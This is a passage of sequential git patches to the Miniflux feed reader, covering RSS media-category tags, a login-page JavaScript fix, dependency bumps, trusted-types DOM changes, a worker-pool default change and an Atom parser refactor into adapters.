entry.Tags = append(entry.Tags, item.Categories...)
+ entry.Tags = append(entry.Tags, item.MediaCategories.Labels()...)
entry.Tags = append(entry.Tags, r.rss.Channel.Categories...)
entry.Tags = append(entry.Tags, r.rss.Channel.GetItunesCategories()...)
diff --git a/internal/reader/rss/parser_test.go b/internal/reader/rss/parser_test.go
index 41b36e8e..7e9413b0 100644
--- a/internal/reader/rss/parser_test.go
+++ b/internal/reader/rss/parser_test.go
@@ -1681,6 +1681,42 @@ func TestParseFeedWithGooglePlayCategory(t *testing.T) {
}
}
+func TestParseEntryWithMediaCategories(t *testing.T) {
+ data := `
+
+
+ Example
+ https://example.org/
+
+ Test
+ https://example.org/item
+ visual_art
+ music/artist/album/song
+ ycantpark mobile
+ Arts/Movies/Titles/A/Ace_Ventura_Series/Ace_Ventura_ -_Pet_Detective
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries[0].Tags) != 2 {
+ t.Errorf("Incorrect number of tags, got: %d", len(feed.Entries[0].Tags))
+ }
+
+ expected := []string{"Visual Art", "Ace Ventura - Pet Detective"}
+ result := feed.Entries[0].Tags
+
+ for i, tag := range result {
+ if tag != expected[i] {
+ t.Errorf("Incorrect tag, got: %q", tag)
+ }
+ }
+}
+
func TestParseFeedWithTTLField(t *testing.T) {
data := `
From ca919c2ff8fbaf26ffc0ac72f42f7343e10ee521 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Wed, 13 Mar 2024 21:40:56 -0700
Subject: [PATCH 13/80] Fix JavaScript error on the login page
---
internal/ui/static/js/bootstrap.js | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/internal/ui/static/js/bootstrap.js b/internal/ui/static/js/bootstrap.js
index e89a74dc..1b820eb5 100644
--- a/internal/ui/static/js/bootstrap.js
+++ b/internal/ui/static/js/bootstrap.js
@@ -117,8 +117,10 @@ document.addEventListener("DOMContentLoaded", () => {
fixVoiceOverDetailsSummaryBug();
const logoElement = document.querySelector(".logo");
- logoElement.addEventListener("click", toggleMainMenu);
- logoElement.addEventListener("keydown", toggleMainMenu);
+ if (logoElement) {
+ logoElement.addEventListener("click", toggleMainMenu);
+ logoElement.addEventListener("keydown", toggleMainMenu);
+ }
onClick(".header nav li", (event) => onClickMainMenuListItem(event));
From bf6d2867356bc598510480c43d18293dfffc0f49 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 14 Mar 2024 22:43:24 +0000
Subject: [PATCH 14/80] Bump github.com/go-webauthn/webauthn from 0.10.1 to
0.10.2
Bumps [github.com/go-webauthn/webauthn](https://github.com/go-webauthn/webauthn) from 0.10.1 to 0.10.2.
- [Release notes](https://github.com/go-webauthn/webauthn/releases)
- [Commits](https://github.com/go-webauthn/webauthn/compare/v0.10.1...v0.10.2)
---
updated-dependencies:
- dependency-name: github.com/go-webauthn/webauthn
dependency-type: direct:production
update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot]
---
go.mod | 8 ++++----
go.sum | 20 ++++++++++----------
2 files changed, 14 insertions(+), 14 deletions(-)
diff --git a/go.mod b/go.mod
index 626a87d1..f47981fb 100644
--- a/go.mod
+++ b/go.mod
@@ -6,7 +6,7 @@ require (
github.com/PuerkitoBio/goquery v1.9.1
github.com/abadojack/whatlanggo v1.0.1
github.com/coreos/go-oidc/v3 v3.9.0
- github.com/go-webauthn/webauthn v0.10.1
+ github.com/go-webauthn/webauthn v0.10.2
github.com/gorilla/mux v1.8.1
github.com/lib/pq v1.10.9
github.com/prometheus/client_golang v1.19.0
@@ -20,8 +20,8 @@ require (
)
require (
- github.com/go-webauthn/x v0.1.8 // indirect
- github.com/golang-jwt/jwt/v5 v5.2.0 // indirect
+ github.com/go-webauthn/x v0.1.9 // indirect
+ github.com/golang-jwt/jwt/v5 v5.2.1 // indirect
github.com/google/go-tpm v0.9.0 // indirect
)
@@ -29,7 +29,7 @@ require (
github.com/andybalholm/cascadia v1.3.2 // indirect
github.com/beorn7/perks v1.0.1 // indirect
github.com/cespare/xxhash/v2 v2.2.0 // indirect
- github.com/fxamacker/cbor/v2 v2.5.0 // indirect
+ github.com/fxamacker/cbor/v2 v2.6.0 // indirect
github.com/go-jose/go-jose/v3 v3.0.3 // indirect
github.com/golang/protobuf v1.5.3 // indirect
github.com/google/uuid v1.6.0 // indirect
diff --git a/go.sum b/go.sum
index 7ee72412..01dd795d 100644
--- a/go.sum
+++ b/go.sum
@@ -13,16 +13,16 @@ github.com/coreos/go-oidc/v3 v3.9.0/go.mod h1:rTKz2PYwftcrtoCzV5g5kvfJoWcm0Mk8AF
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
-github.com/fxamacker/cbor/v2 v2.5.0 h1:oHsG0V/Q6E/wqTS2O1Cozzsy69nqCiguo5Q1a1ADivE=
-github.com/fxamacker/cbor/v2 v2.5.0/go.mod h1:TA1xS00nchWmaBnEIxPSE5oHLuJBAVvqrtAnWBwBCVo=
+github.com/fxamacker/cbor/v2 v2.6.0 h1:sU6J2usfADwWlYDAFhZBQ6TnLFBHxgesMrQfQgk1tWA=
+github.com/fxamacker/cbor/v2 v2.6.0/go.mod h1:pxXPTn3joSm21Gbwsv0w9OSA2y1HFR9qXEeXQVeNoDQ=
github.com/go-jose/go-jose/v3 v3.0.3 h1:fFKWeig/irsp7XD2zBxvnmA/XaRWp5V3CBsZXJF7G7k=
github.com/go-jose/go-jose/v3 v3.0.3/go.mod h1:5b+7YgP7ZICgJDBdfjZaIt+H/9L9T/YQrVfLAMboGkQ=
-github.com/go-webauthn/webauthn v0.10.1 h1:+RFKj4yHPy282teiiy5sqTYPfRilzBpJyedrz9KsNFE=
-github.com/go-webauthn/webauthn v0.10.1/go.mod h1:a7BwAtrSMkeuJXtIKz433Av99nAv01pdfzB0a9xkDnI=
-github.com/go-webauthn/x v0.1.8 h1:f1C6k1AyUlDvnIzWSW+G9rN9nbp1hhLXZagUtyxZ8nc=
-github.com/go-webauthn/x v0.1.8/go.mod h1:i8UNlGVt3oy6oAFcP4SZB1djZLx/4pbekCbWowjTaJg=
-github.com/golang-jwt/jwt/v5 v5.2.0 h1:d/ix8ftRUorsN+5eMIlF4T6J8CAt9rch3My2winC1Jw=
-github.com/golang-jwt/jwt/v5 v5.2.0/go.mod h1:pqrtFR0X4osieyHYxtmOUWsAWrfe1Q5UVIyoH402zdk=
+github.com/go-webauthn/webauthn v0.10.2 h1:OG7B+DyuTytrEPFmTX503K77fqs3HDK/0Iv+z8UYbq4=
+github.com/go-webauthn/webauthn v0.10.2/go.mod h1:Gd1IDsGAybuvK1NkwUTLbGmeksxuRJjVN2PE/xsPxHs=
+github.com/go-webauthn/x v0.1.9 h1:v1oeLmoaa+gPOaZqUdDentu6Rl7HkSSsmOT6gxEQHhE=
+github.com/go-webauthn/x v0.1.9/go.mod h1:pJNMlIMP1SU7cN8HNlKJpLEnFHCygLCvaLZ8a1xeoQA=
+github.com/golang-jwt/jwt/v5 v5.2.1 h1:OuVbFODueb089Lh128TAcimifWaLhJwVflnrgM17wHk=
+github.com/golang-jwt/jwt/v5 v5.2.1/go.mod h1:pqrtFR0X4osieyHYxtmOUWsAWrfe1Q5UVIyoH402zdk=
github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg=
@@ -53,8 +53,8 @@ github.com/prometheus/procfs v0.12.0 h1:jluTpSng7V9hY0O2R9DzzJHYb2xULk9VTR1V1R/k
github.com/prometheus/procfs v0.12.0/go.mod h1:pcuDEFsWDnvcgNzo4EEweacyhjeA9Zk3cnaOZAZEfOo=
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
-github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk=
-github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo=
+github.com/stretchr/testify v1.9.0 h1:HtqpIVDClZ4nwg75+f6Lvsy/wHu+3BoSGCbBAcpTsTg=
+github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY=
github.com/tdewolff/minify/v2 v2.20.19 h1:tX0SR0LUrIqGoLjXnkIzRSIbKJ7PaNnSENLD4CyH6Xo=
github.com/tdewolff/minify/v2 v2.20.19/go.mod h1:ulkFoeAVWMLEyjuDz1ZIWOA31g5aWOawCFRp9R/MudM=
github.com/tdewolff/parse/v2 v2.7.12 h1:tgavkHc2ZDEQVKy1oWxwIyh5bP4F5fEh/JmBwPP/3LQ=
From 7310e134996a41a1e2a2dc1dbe9f60c75cdde8cf Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Thu, 14 Mar 2024 12:56:48 +0100
Subject: [PATCH 15/80] More trusted-types compatibility
---
internal/ui/static/js/app.js | 10 +++++-----
1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/internal/ui/static/js/app.js b/internal/ui/static/js/app.js
index 2ce1a1e8..89f61c79 100644
--- a/internal/ui/static/js/app.js
+++ b/internal/ui/static/js/app.js
@@ -201,7 +201,7 @@ function toggleEntryStatus(element, toasting) {
}
}
- link.innerHTML = iconElement.innerHTML;
+ link.replaceChildren(iconElement.content.cloneNode(true));
addIcon(link, label);
link.dataset.value = newStatus;
@@ -322,7 +322,7 @@ function toggleBookmark(parentElement, toasting) {
}
}
- element.innerHTML = iconElement.innerHTML;
+ element.replaceChildren(iconElement.content.cloneNode(true));
addIcon(element, label);
element.dataset.value = newStarStatus;
});
@@ -353,7 +353,7 @@ function handleFetchOriginalContent() {
document.querySelector(".entry-content").innerHTML = data.content;
const entryReadingtimeElement = document.querySelector(".entry-reading-time");
if (entryReadingtimeElement) {
- entryReadingtimeElement.innerHTML = data.reading_time;
+ entryReadingtimeElement.textContent = data.reading_time;
}
}
});
@@ -533,7 +533,7 @@ function incrementUnreadCounter(n) {
function updateUnreadCounterValue(callback) {
document.querySelectorAll("span.unread-counter").forEach((element) => {
const oldValue = parseInt(element.textContent, 10);
- element.innerHTML = callback(oldValue);
+ element.textContent = callback(oldValue);
});
if (window.location.href.endsWith('/unread')) {
@@ -628,7 +628,7 @@ function showToast(label, iconElement) {
const toastMsgElement = document.getElementById("toast-msg");
if (toastMsgElement) {
- toastMsgElement.innerHTML = iconElement.innerHTML;
+ toastMsgElement.replaceChildren(iconElement.content.cloneNode(true));
addIcon(toastMsgElement, label);
const toastElementWrapper = document.getElementById("toast-wrapper");
From 7a307f8e74b98f8c76dab8647f89d006b8dfa703 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Thu, 14 Mar 2024 17:19:16 -0700
Subject: [PATCH 16/80] Fix regression: Add to Home Screen button is unreadable
Regression introduced in commit https://github.com/miniflux/v2/commit/ea58bac5489cd71f898312132f6e8d7b42cb4d33
---
internal/ui/static/css/common.css | 2 ++
1 file changed, 2 insertions(+)
diff --git a/internal/ui/static/css/common.css b/internal/ui/static/css/common.css
index aa107d12..1a3c3ee8 100644
--- a/internal/ui/static/css/common.css
+++ b/internal/ui/static/css/common.css
@@ -242,6 +242,8 @@ a:hover {
text-decoration: none;
line-height: 30px;
color: #fff;
+ background-color: transparent;
+ border: 0;
}
#btn-add-to-home-screen:hover {
From 2ba893bc79eb7e8cdcf5dfe4929f818247fcd82d Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Thu, 14 Mar 2024 22:59:38 +0100
Subject: [PATCH 17/80] Bump the number of simultaneous workers
We're in 2024, I'm pretty sure we can afford to have 16 simultaneous open http
connections at the same time, instead of only 5.
---
internal/config/options.go | 2 +-
miniflux.1 | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/internal/config/options.go b/internal/config/options.go
index 483192f9..2169504f 100644
--- a/internal/config/options.go
+++ b/internal/config/options.go
@@ -27,7 +27,7 @@ const (
defaultBaseURL = "http://localhost"
defaultRootURL = "http://localhost"
defaultBasePath = ""
- defaultWorkerPoolSize = 5
+ defaultWorkerPoolSize = 16
defaultPollingFrequency = 60
defaultForceRefreshInterval = 30
defaultBatchSize = 100
diff --git a/miniflux.1 b/miniflux.1
index 81e8d721..a07c678e 100644
--- a/miniflux.1
+++ b/miniflux.1
@@ -165,7 +165,7 @@ Default is "info"\&.
.B WORKER_POOL_SIZE
Number of background workers\&.
.br
-Default is 5 workers\&.
+Default is 16 workers\&.
.TP
.B POLLING_FREQUENCY
Refresh interval in minutes for feeds\&.
From dd4fb660c19fd1f6ce5716f9f5783eb7565fed2d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Fri, 15 Mar 2024 16:39:32 -0700
Subject: [PATCH 18/80] Refactor Atom parser to use an adapter
---
internal/reader/atom/atom_03.go | 216 +++++--------
internal/reader/atom/atom_03_adapter.go | 115 +++++++
internal/reader/atom/atom_03_test.go | 26 +-
internal/reader/atom/atom_10.go | 407 ++++++++++--------------
internal/reader/atom/atom_10_adapter.go | 210 ++++++++++++
internal/reader/atom/atom_10_test.go | 145 ++++-----
internal/reader/atom/atom_common.go | 111 +++++--
internal/reader/atom/parser.go | 28 +-
internal/reader/json/adapter.go | 4 +-
internal/reader/parser/parser_test.go | 30 +-
internal/reader/rss/adapter.go | 3 +-
11 files changed, 795 insertions(+), 500 deletions(-)
create mode 100644 internal/reader/atom/atom_03_adapter.go
create mode 100644 internal/reader/atom/atom_10_adapter.go
diff --git a/internal/reader/atom/atom_03.go b/internal/reader/atom/atom_03.go
index edcb83dc..fb458e91 100644
--- a/internal/reader/atom/atom_03.go
+++ b/internal/reader/atom/atom_03.go
@@ -6,158 +6,114 @@ package atom // import "miniflux.app/v2/internal/reader/atom"
import (
"encoding/base64"
"html"
- "log/slog"
"strings"
- "time"
-
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
- "miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
)
// Specs: http://web.archive.org/web/20060811235523/http://www.mnot.net/drafts/draft-nottingham-atom-format-02.html
-type atom03Feed struct {
- ID string `xml:"id"`
- Title atom03Text `xml:"title"`
- Author atomPerson `xml:"author"`
- Links atomLinks `xml:"link"`
- Entries []atom03Entry `xml:"entry"`
+type Atom03Feed struct {
+ Version string `xml:"version,attr"`
+
+ // The "atom:id" element's content conveys a permanent, globally unique identifier for the feed.
+ // It MUST NOT change over time, even if the feed is relocated. atom:feed elements MAY contain an atom:id element,
+ // but MUST NOT contain more than one. The content of this element, when present, MUST be a URI.
+ ID string `xml:"http://purl.org/atom/ns# id"`
+
+ // The "atom:title" element is a Content construct that conveys a human-readable title for the feed.
+ // atom:feed elements MUST contain exactly one atom:title element.
+ // If the feed describes a Web resource, its content SHOULD be the same as that resource's title.
+ Title Atom03Content `xml:"http://purl.org/atom/ns# title"`
+
+ // The "atom:link" element is a Link construct that conveys a URI associated with the feed.
+ // The nature of the relationship as well as the link itself is determined by the element's content.
+ // atom:feed elements MUST contain at least one atom:link element with a rel attribute value of "alternate".
+ // atom:feed elements MUST NOT contain more than one atom:link element with a rel attribute value of "alternate" that has the same type attribute value.
+ // atom:feed elements MAY contain additional atom:link elements beyond those described above.
+ Links AtomLinks `xml:"http://purl.org/atom/ns# link"`
+
+ // The "atom:author" element is a Person construct that indicates the default author of the feed.
+ // atom:feed elements MUST contain exactly one atom:author element,
+ // UNLESS all of the atom:feed element's child atom:entry elements contain an atom:author element.
+ // atom:feed elements MUST NOT contain more than one atom:author element.
+ Author AtomPerson `xml:"http://purl.org/atom/ns# author"`
+
+ // The "atom:entry" element's represents an individual entry that is contained by the feed.
+ // atom:feed elements MAY contain one or more atom:entry elements.
+ Entries []Atom03Entry `xml:"http://purl.org/atom/ns# entry"`
}
-func (a *atom03Feed) Transform(baseURL string) *model.Feed {
- var err error
+type Atom03Entry struct {
+ // The "atom:id" element's content conveys a permanent, globally unique identifier for the entry.
+ // It MUST NOT change over time, even if other representations of the entry (such as a web representation pointed to by the entry's atom:link element) are relocated.
+ // If the same entry is syndicated in two atom:feeds published by the same entity, the entry's atom:id MUST be the same in both feeds.
+ ID string `xml:"id"`
- feed := new(model.Feed)
+ // The "atom:title" element is a Content construct that conveys a human-readable title for the entry.
+ // atom:entry elements MUST have exactly one "atom:title" element.
+ // If an entry describes a Web resource, its content SHOULD be the same as that resource's title.
+ Title Atom03Content `xml:"title"`
- feedURL := a.Links.firstLinkWithRelation("self")
- feed.FeedURL, err = urllib.AbsoluteURL(baseURL, feedURL)
- if err != nil {
- feed.FeedURL = feedURL
- }
+ // The "atom:modified" element is a Date construct that indicates the time that the entry was last modified.
+ // atom:entry elements MUST contain an atom:modified element, but MUST NOT contain more than one.
+ // The content of an atom:modified element MUST have a time zone whose value SHOULD be "UTC".
+ Modified string `xml:"modified"`
- siteURL := a.Links.originalLink()
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, siteURL)
- if err != nil {
- feed.SiteURL = siteURL
- }
+ // The "atom:issued" element is a Date construct that indicates the time that the entry was issued.
+ // atom:entry elements MUST contain an atom:issued element, but MUST NOT contain more than one.
+ // The content of an atom:issued element MAY omit a time zone.
+ Issued string `xml:"issued"`
- feed.Title = a.Title.String()
- if feed.Title == "" {
- feed.Title = feed.SiteURL
- }
+ // The "atom:created" element is a Date construct that indicates the time that the entry was created.
+ // atom:entry elements MAY contain an atom:created element, but MUST NOT contain more than one.
+ // The content of an atom:created element MUST have a time zone whose value SHOULD be "UTC".
+ // If atom:created is not present, its content MUST considered to be the same as that of atom:modified.
+ Created string `xml:"created"`
- for _, entry := range a.Entries {
- item := entry.Transform()
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, item.URL)
- if err == nil {
- item.URL = entryURL
- }
+ // The "atom:link" element is a Link construct that conveys a URI associated with the entry.
+ // The nature of the relationship as well as the link itself is determined by the element's content.
+ // atom:entry elements MUST contain at least one atom:link element with a rel attribute value of "alternate".
+ // atom:entry elements MUST NOT contain more than one atom:link element with a rel attribute value of "alternate" that has the same type attribute value.
+ // atom:entry elements MAY contain additional atom:link elements beyond those described above.
+ Links AtomLinks `xml:"link"`
- if item.Author == "" {
- item.Author = a.Author.String()
- }
+ // The "atom:summary" element is a Content construct that conveys a short summary, abstract or excerpt of the entry.
+ // atom:entry elements MAY contain an atom:created element, but MUST NOT contain more than one.
+ Summary Atom03Content `xml:"summary"`
- if item.Title == "" {
- item.Title = sanitizer.TruncateHTML(item.Content, 100)
- }
+ // The "atom:content" element is a Content construct that conveys the content of the entry.
+ // atom:entry elements MAY contain one or more atom:content elements.
+ Content Atom03Content `xml:"content"`
- if item.Title == "" {
- item.Title = item.URL
- }
-
- feed.Entries = append(feed.Entries, item)
- }
-
- return feed
+ // The "atom:author" element is a Person construct that indicates the default author of the entry.
+ // atom:entry elements MUST contain exactly one atom:author element,
+ // UNLESS the atom:feed element containing them contains an atom:author element itself.
+ // atom:entry elements MUST NOT contain more than one atom:author element.
+ Author AtomPerson `xml:"author"`
}
-type atom03Entry struct {
- ID string `xml:"id"`
- Title atom03Text `xml:"title"`
- Modified string `xml:"modified"`
- Issued string `xml:"issued"`
- Created string `xml:"created"`
- Links atomLinks `xml:"link"`
- Summary atom03Text `xml:"summary"`
- Content atom03Text `xml:"content"`
- Author atomPerson `xml:"author"`
-}
+type Atom03Content struct {
+ // Content constructs MAY have a "type" attribute, whose value indicates the media type of the content.
+ // When present, this attribute's value MUST be a registered media type [RFC2045].
+ // If not present, its value MUST be considered to be "text/plain".
+ Type string `xml:"type,attr"`
-func (a *atom03Entry) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.URL = a.Links.originalLink()
- entry.Date = a.entryDate()
- entry.Author = a.Author.String()
- entry.Hash = a.entryHash()
- entry.Content = a.entryContent()
- entry.Title = a.entryTitle()
- return entry
-}
+ // Content constructs MAY have a "mode" attribute, whose value indicates the method used to encode the content.
+ // When present, this attribute's value MUST be listed below.
+ // If not present, its value MUST be considered to be "xml".
+ //
+ // "xml": A mode attribute with the value "xml" indicates that the element's content is inline xml (for example, namespace-qualified XHTML).
+ //
+ // "escaped": A mode attribute with the value "escaped" indicates that the element's content is an escaped string.
+ // Processors MUST unescape the element's content before considering it as content of the indicated media type.
+ //
+ // "base64": A mode attribute with the value "base64" indicates that the element's content is base64-encoded [RFC2045].
+ // Processors MUST decode the element's content before considering it as content of the the indicated media type.
+ Mode string `xml:"mode,attr"`
-func (a *atom03Entry) entryTitle() string {
- return sanitizer.StripTags(a.Title.String())
-}
-
-func (a *atom03Entry) entryContent() string {
- content := a.Content.String()
- if content != "" {
- return content
- }
-
- summary := a.Summary.String()
- if summary != "" {
- return summary
- }
-
- return ""
-}
-
-func (a *atom03Entry) entryDate() time.Time {
- dateText := ""
- for _, value := range []string{a.Issued, a.Modified, a.Created} {
- if value != "" {
- dateText = value
- break
- }
- }
-
- if dateText != "" {
- result, err := date.Parse(dateText)
- if err != nil {
- slog.Debug("Unable to parse date from Atom 0.3 feed",
- slog.String("date", dateText),
- slog.String("id", a.ID),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return result
- }
-
- return time.Now()
-}
-
-func (a *atom03Entry) entryHash() string {
- for _, value := range []string{a.ID, a.Links.originalLink()} {
- if value != "" {
- return crypto.Hash(value)
- }
- }
-
- return ""
-}
-
-type atom03Text struct {
- Type string `xml:"type,attr"`
- Mode string `xml:"mode,attr"`
CharData string `xml:",chardata"`
InnerXML string `xml:",innerxml"`
}
-func (a *atom03Text) String() string {
+func (a *Atom03Content) Content() string {
content := ""
switch {
diff --git a/internal/reader/atom/atom_03_adapter.go b/internal/reader/atom/atom_03_adapter.go
new file mode 100644
index 00000000..02d78ec8
--- /dev/null
+++ b/internal/reader/atom/atom_03_adapter.go
@@ -0,0 +1,115 @@
+// SPDX-FileCopyrightText: Copyright The Miniflux Authors. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+
+package atom // import "miniflux.app/v2/internal/reader/atom"
+
+import (
+ "log/slog"
+ "time"
+
+ "miniflux.app/v2/internal/crypto"
+ "miniflux.app/v2/internal/model"
+ "miniflux.app/v2/internal/reader/date"
+ "miniflux.app/v2/internal/reader/sanitizer"
+ "miniflux.app/v2/internal/urllib"
+)
+
+type Atom03Adapter struct {
+ atomFeed *Atom03Feed
+}
+
+func NewAtom03Adapter(atomFeed *Atom03Feed) *Atom03Adapter {
+ return &Atom03Adapter{atomFeed}
+}
+
+func (a *Atom03Adapter) BuildFeed(baseURL string) *model.Feed {
+ feed := new(model.Feed)
+
+ // Populate the feed URL.
+ feedURL := a.atomFeed.Links.firstLinkWithRelation("self")
+ if feedURL != "" {
+ if absoluteFeedURL, err := urllib.AbsoluteURL(baseURL, feedURL); err == nil {
+ feed.FeedURL = absoluteFeedURL
+ }
+ } else {
+ feed.FeedURL = baseURL
+ }
+
+ // Populate the site URL.
+ siteURL := a.atomFeed.Links.OriginalLink()
+ if siteURL != "" {
+ if absoluteSiteURL, err := urllib.AbsoluteURL(baseURL, siteURL); err == nil {
+ feed.SiteURL = absoluteSiteURL
+ }
+ } else {
+ feed.SiteURL = baseURL
+ }
+
+ // Populate the feed title.
+ feed.Title = a.atomFeed.Title.Content()
+ if feed.Title == "" {
+ feed.Title = feed.SiteURL
+ }
+
+ for _, atomEntry := range a.atomFeed.Entries {
+ entry := model.NewEntry()
+
+ // Populate the entry URL.
+ entry.URL = atomEntry.Links.OriginalLink()
+ if entry.URL != "" {
+ if absoluteEntryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL); err == nil {
+ entry.URL = absoluteEntryURL
+ }
+ }
+
+ // Populate the entry content.
+ entry.Content = atomEntry.Content.Content()
+ if entry.Content == "" {
+ entry.Content = atomEntry.Summary.Content()
+ }
+
+ // Populate the entry title.
+ entry.Title = atomEntry.Title.Content()
+ if entry.Title == "" {
+ entry.Title = sanitizer.TruncateHTML(entry.Content, 100)
+ }
+ if entry.Title == "" {
+ entry.Title = entry.URL
+ }
+
+ // Populate the entry author.
+ entry.Author = atomEntry.Author.PersonName()
+ if entry.Author == "" {
+ entry.Author = a.atomFeed.Author.PersonName()
+ }
+
+ // Populate the entry date.
+ for _, value := range []string{atomEntry.Issued, atomEntry.Modified, atomEntry.Created} {
+ if parsedDate, err := date.Parse(value); err == nil {
+ entry.Date = parsedDate
+ break
+ } else {
+ slog.Debug("Unable to parse date from Atom 0.3 feed",
+ slog.String("date", value),
+ slog.String("id", atomEntry.ID),
+ slog.Any("error", err),
+ )
+ }
+ }
+ if entry.Date.IsZero() {
+ entry.Date = time.Now()
+ }
+
+ // Generate the entry hash.
+ for _, value := range []string{atomEntry.ID, atomEntry.Links.OriginalLink()} {
+ if value != "" {
+ entry.Hash = crypto.Hash(value)
+ break
+ }
+ }
+
+ feed.Entries = append(feed.Entries, entry)
+ }
+
+ return feed
+}
diff --git a/internal/reader/atom/atom_03_test.go b/internal/reader/atom/atom_03_test.go
index 321c0d82..54662bc9 100644
--- a/internal/reader/atom/atom_03_test.go
+++ b/internal/reader/atom/atom_03_test.go
@@ -27,7 +27,7 @@ func TestParseAtom03(t *testing.T) {
`
- feed, err := Parse("http://diveintomark.org/", bytes.NewReader([]byte(data)), "0.3")
+ feed, err := Parse("http://diveintomark.org/atom.xml", bytes.NewReader([]byte(data)), "0.3")
if err != nil {
t.Fatal(err)
}
@@ -36,7 +36,7 @@ func TestParseAtom03(t *testing.T) {
t.Errorf("Incorrect title, got: %s", feed.Title)
}
- if feed.FeedURL != "http://diveintomark.org/" {
+ if feed.FeedURL != "http://diveintomark.org/atom.xml" {
t.Errorf("Incorrect feed URL, got: %s", feed.FeedURL)
}
@@ -74,6 +74,28 @@ func TestParseAtom03(t *testing.T) {
}
}
+func TestParseAtom03WithoutSiteURL(t *testing.T) {
+ data := `
+
+ 2003-12-13T18:30:02Z
+ Mark Pilgrim
+
+ Atom 0.3 snapshot
+
+ tag:diveintomark.org,2003:3.2397
+
+ `
+
+ feed, err := Parse("http://diveintomark.org/atom.xml", bytes.NewReader([]byte(data)), "0.3")
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "http://diveintomark.org/atom.xml" {
+ t.Errorf("Incorrect title, got: %s", feed.Title)
+ }
+}
+
func TestParseAtom03WithoutFeedTitle(t *testing.T) {
data := `
diff --git a/internal/reader/atom/atom_10.go b/internal/reader/atom/atom_10.go
index 798a8748..201d00d1 100644
--- a/internal/reader/atom/atom_10.go
+++ b/internal/reader/atom/atom_10.go
@@ -6,286 +6,199 @@ package atom // import "miniflux.app/v2/internal/reader/atom"
import (
"encoding/xml"
"html"
- "log/slog"
- "strconv"
"strings"
- "time"
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
"miniflux.app/v2/internal/reader/media"
"miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
)
+// The "atom:feed" element is the document (i.e., top-level) element of
+// an Atom Feed Document, acting as a container for metadata and data
+// associated with the feed. Its element children consist of metadata
+// elements followed by zero or more atom:entry child elements.
+//
// Specs:
// https://tools.ietf.org/html/rfc4287
// https://validator.w3.org/feed/docs/atom.html
-type atom10Feed struct {
- XMLName xml.Name `xml:"http://www.w3.org/2005/Atom feed"`
- ID string `xml:"id"`
- Title atom10Text `xml:"title"`
- Authors atomAuthors `xml:"author"`
- Icon string `xml:"icon"`
- Links atomLinks `xml:"link"`
- Entries []atom10Entry `xml:"entry"`
+type Atom10Feed struct {
+ XMLName xml.Name `xml:"http://www.w3.org/2005/Atom feed"`
+
+ // The "atom:id" element conveys a permanent, universally unique
+ // identifier for an entry or feed.
+ //
+ // Its content MUST be an IRI, as defined by [RFC3987]. Note that the
+ // definition of "IRI" excludes relative references. Though the IRI
+ // might use a dereferencable scheme, Atom Processors MUST NOT assume it
+ // can be dereferenced.
+ //
+ // atom:feed elements MUST contain exactly one atom:id element.
+ ID string `xml:"http://www.w3.org/2005/Atom id"`
+
+ // The "atom:title" element is a Text construct that conveys a human-
+ // readable title for an entry or feed.
+ //
+ // atom:feed elements MUST contain exactly one atom:title element.
+ Title Atom10Text `xml:"http://www.w3.org/2005/Atom title"`
+
+ // The "atom:author" element is a Person construct that indicates the
+ // author of the entry or feed.
+ //
+ // atom:feed elements MUST contain one or more atom:author elements,
+ // unless all of the atom:feed element's child atom:entry elements
+ // contain at least one atom:author element.
+ Authors AtomPersons `xml:"http://www.w3.org/2005/Atom author"`
+
+ // The "atom:icon" element's content is an IRI reference [RFC3987] that
